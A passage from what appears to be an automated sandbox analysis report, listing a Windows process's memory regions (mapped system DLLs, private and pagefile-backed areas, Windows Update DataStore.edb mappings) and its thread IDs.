"\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1718 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1719 start_va = 0x7ff87ae70000 end_va = 0x7ff87aeaffff monitored = 0 entry_point = 0x7ff87ae81960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1720 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1721 start_va = 0x7ff87afe0000 end_va = 0x7ff87b006fff monitored = 0 entry_point = 0x7ff87afe7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1722 start_va = 0x7ff87b030000 end_va = 0x7ff87b0d9fff monitored = 0 entry_point = 0x7ff87b057910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1723 start_va = 0x7ff87b0e0000 end_va = 0x7ff87b1dffff monitored = 0 entry_point = 0x7ff87b120f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1724 start_va = 0x7ff87b270000 end_va = 0x7ff87b27bfff monitored = 0 entry_point = 0x7ff87b272480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1725 start_va = 0x7ff87b340000 end_va = 0x7ff87b371fff monitored = 0 entry_point = 0x7ff87b352340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1726 start_va = 0x7ff87b5b0000 end_va = 0x7ff87b5bbfff monitored = 0 entry_point = 0x7ff87b5b2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1727 start_va = 0x7ff87b5c0000 end_va = 0x7ff87b5e3fff monitored = 0 entry_point = 0x7ff87b5c3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1728 start_va = 0x7ff87b760000 end_va = 0x7ff87b853fff monitored = 0 entry_point = 0x7ff87b76a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1729 start_va = 0x7ff87b8b0000 end_va = 0x7ff87b8f8fff monitored = 0 entry_point = 0x7ff87b8ba090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1730 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1731 start_va = 0x7ff87ba10000 end_va = 0x7ff87ba1cfff monitored = 0 entry_point = 0x7ff87ba11fe0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1732 start_va = 0x7ff87bab0000 end_va = 0x7ff87bae0fff monitored = 0 entry_point = 0x7ff87bab7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1733 start_va = 0x7ff87bb10000 end_va = 0x7ff87bb89fff monitored = 0 entry_point = 0x7ff87bb31a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1734 start_va = 0x7ff87bbd0000 end_va = 0x7ff87bc03fff monitored = 0 entry_point = 0x7ff87bbeae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1735 start_va = 0x7ff87bc10000 end_va = 0x7ff87bc19fff monitored = 0 entry_point = 0x7ff87bc11830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1736 start_va = 0x7ff87bd20000 end_va = 0x7ff87bd3efff monitored = 0 entry_point = 0x7ff87bd25d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1737 start_va = 0x7ff87be90000 end_va = 0x7ff87beebfff monitored = 0 entry_point = 0x7ff87bea6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1738 start_va = 0x7ff87bf40000 end_va = 0x7ff87bf56fff monitored = 0 entry_point = 0x7ff87bf479d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1739 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1740 start_va = 0x7ff87c0a0000 end_va = 0x7ff87c0c0fff monitored = 0 entry_point = 0x7ff87c0b0250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1741 start_va = 0x7ff87c0f0000 end_va = 0x7ff87c129fff monitored = 0 entry_point = 0x7ff87c0f8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1742 start_va = 0x7ff87c130000 end_va = 0x7ff87c156fff monitored = 0 entry_point = 0x7ff87c140aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1743 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1744 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1745 start_va = 0x7ff87c430000 end_va = 0x7ff87c448fff monitored = 0 entry_point = 0x7ff87c435e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1746 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1747 start_va = 0x7ff87c480000 end_va = 0x7ff87c518fff monitored = 0 entry_point = 0x7ff87c4af4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1748 start_va = 0x7ff87c5c0000 end_va = 0x7ff87c5cffff monitored = 0 entry_point = 0x7ff87c5c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1749 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1750 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1751 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1752 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1753 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1754 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1755 start_va = 0x7ff87cdb0000 end_va = 0x7ff87ce35fff monitored = 0 entry_point = 0x7ff87cdbd8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1756 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1757 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1758 start_va = 0x7ff87d0a0000 end_va = 0x7ff87d0b6fff monitored = 0 entry_point = 0x7ff87d0a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1759 start_va = 0x7ff87d170000 end_va = 0x7ff87d336fff monitored = 0 entry_point = 0x7ff87d1cdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1760 start_va = 0x7ff87d340000 end_va = 0x7ff87d394fff monitored = 0 entry_point = 0x7ff87d357970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1761 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1762 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1763 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1764 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1765 start_va = 0x7ff87efa0000 end_va = 0x7ff87efa7fff monitored = 0 entry_point = 0x7ff87efa1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1766 start_va = 0x7ff87efb0000 end_va = 0x7ff87f3d8fff monitored = 0 entry_point = 0x7ff87efd8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1767 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1768 start_va = 0x7ff87f570000 end_va = 0x7ff87f5cbfff monitored = 0 entry_point = 0x7ff87f58b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1769 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1770 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1771 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1772 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1773 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1774 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1775 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1776 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1777 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1778 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1928 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1929 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1930 start_va = 0x1180000 end_va = 0x11c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1931 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 1932 start_va = 0x1eb0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 1933 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 1934 start_va = 0x1ed0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 1935 start_va = 0x1ee0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 1936 start_va = 0x1ef0000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 1937 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1938 start_va = 0x2f80000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 1939 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1940 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 1941 start_va = 0x1e40000 end_va = 0x1e8dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 1942 start_va = 0x2b70000 end_va = 0x2bbdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 1947 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1948 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 1949 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1950 start_va = 0xfe0000 end_va = 0xfe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1951 start_va = 0xff0000 end_va = 0xff0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 1952 start_va = 0x11d0000 end_va = 0x11d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1953 start_va = 0x11f0000 end_va = 0x11f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 1954 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1955 start_va = 0x3380000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003380000" filename = "" Region: id = 1956 start_va = 0x3390000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 1957 start_va = 0x33a0000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033a0000" filename = "" Region: id = 1958 start_va = 0x33b0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033b0000" filename = "" Region: id = 1959 start_va = 0x33c0000 end_va = 0x33cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033c0000" filename = "" Region: id = 1960 start_va = 0x33d0000 end_va = 0x33dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033d0000" filename = "" Region: id = 1961 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1962 start_va = 0x7210000 end_va = 0x735ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007210000" filename = "" Region: id = 1963 start_va = 0x8900000 end_va = 0x98fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008900000" filename = "" Region: id = 1967 start_va = 0x2410000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1968 start_va = 0x2420000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1969 start_va = 0x24d0000 end_va = 0x24d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1970 start_va = 0x24e0000 end_va = 0x24e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1971 start_va = 0x24f0000 end_va = 0x24fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1972 start_va = 0x2bc0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1973 start_va = 0x2ce0000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 1974 start_va = 0x2cf0000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 1975 start_va = 0x33e0000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 1976 start_va = 0x33f0000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 1977 start_va = 0x3480000 end_va = 0x348ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1978 start_va = 0x3490000 end_va = 0x349ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1979 start_va = 0x34c0000 end_va = 0x34c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 1980 start_va = 0x34d0000 end_va = 0x34dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1981 start_va = 0x34e0000 end_va = 0x34effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1982 start_va = 0x34f0000 end_va = 0x34fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1983 start_va = 0x3880000 end_va = 0x388ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1984 start_va = 0x3890000 end_va = 0x389ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1985 start_va = 0x38a0000 end_va = 0x38affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1986 start_va = 0x38b0000 end_va = 0x38bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1987 start_va = 0x38c0000 end_va = 0x38cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1988 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1989 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1990 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2005 start_va = 0x34d0000 end_va = 0x34d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034d0000" filename = "" Region: id = 2006 start_va = 0x38d0000 end_va = 0x38d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038d0000" filename = "" Region: id = 2008 start_va = 0x38d0000 end_va = 0x38dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2009 start_va = 0x38e0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 2010 start_va = 0x3b00000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 2015 start_va = 0x440000 end_va = 0x447fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2021 start_va = 0x1e40000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 2022 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2023 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2024 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2025 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2028 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Thread: id = 69 os_tid = 0x1010 Thread: id = 70 os_tid = 0x100c Thread: id = 71 os_tid = 0xa08 Thread: id = 72 os_tid = 0x9b4 Thread: id = 73 os_tid = 0x2e8 Thread: id = 74 os_tid = 0x448 Thread: id = 75 os_tid = 0x2c0 Thread: id = 76 os_tid = 0x264 Thread: id = 77 os_tid = 0x3a0 Thread: id = 78 os_tid = 0xcec Thread: id = 79 os_tid = 0xb1c Thread: id = 80 os_tid = 0xb18 Thread: id = 81 os_tid = 0xab4 Thread: id = 82 os_tid = 0x848 Thread: id = 83 os_tid = 0xa2c Thread: id = 84 os_tid = 0x9c8 Thread: id = 85 os_tid = 0x5c4 Thread: id = 86 os_tid = 0xbb8 Thread: id = 87 os_tid = 0xbf8 Thread: id = 88 os_tid = 0x4d0 Thread: id = 89 os_tid = 0x728 Thread: id = 90 os_tid = 0x620 Thread: id = 91 os_tid = 0xad4 Thread: id = 92 os_tid = 0x5a4 Thread: id = 93 os_tid = 0x234 Thread: id = 94 os_tid = 0x230 Thread: id = 95 os_tid = 0x224 Thread: id = 96 os_tid = 0xc10 Thread: id = 97 os_tid = 0xc14 Thread: id = 98 os_tid = 0xca8 Thread: id = 99 os_tid = 0xc24 Thread: id = 100 os_tid = 0xac8 Thread: id = 101 os_tid = 0xe30 Thread: id = 102 os_tid = 0xddc Thread: id = 103 os_tid = 0xdb8 Thread: id = 104 os_tid = 0x534 Thread: id = 105 os_tid = 0xa90 Thread: id = 106 os_tid = 0x8c4 